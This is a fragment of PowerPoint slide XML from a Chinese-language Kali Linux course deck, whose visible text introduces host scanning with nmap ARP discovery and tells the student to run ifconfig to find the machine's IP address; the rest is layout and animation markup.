                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
      <p:bldP spid="10" grpId="0"/>
      <p:bldP spid="10" grpId="1"/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="11" grpId="1"/>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a:xfrm>
            <a:off x="533756" y="1946091"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行ARP的主机发现并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="936625" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>步骤一 </a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.1 主机扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1078865"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux系统的命令终端中输入“ifconfig”命令,获取操作机的IP地址，如图2-2-1所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="1724025"/>
            <a:ext cx="5276850" cy="3409950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5551805" y="5133975"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-1 获取操作机的IP地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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等腰三角形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-354902" y="1593655"/>
            <a:ext cx="2812747" cy="2101740"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3859264" y="2678072"/>
            <a:ext cx="5245100" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="等腰三角形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="10384747" y="2655849"/>
            <a:ext cx="2069408" cy="1546303"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="等腰三角形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-436508" y="2327919"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47928" y="2883669"/>
            <a:ext cx="1612900" cy="1568450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="9600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="9600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>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6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="25" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
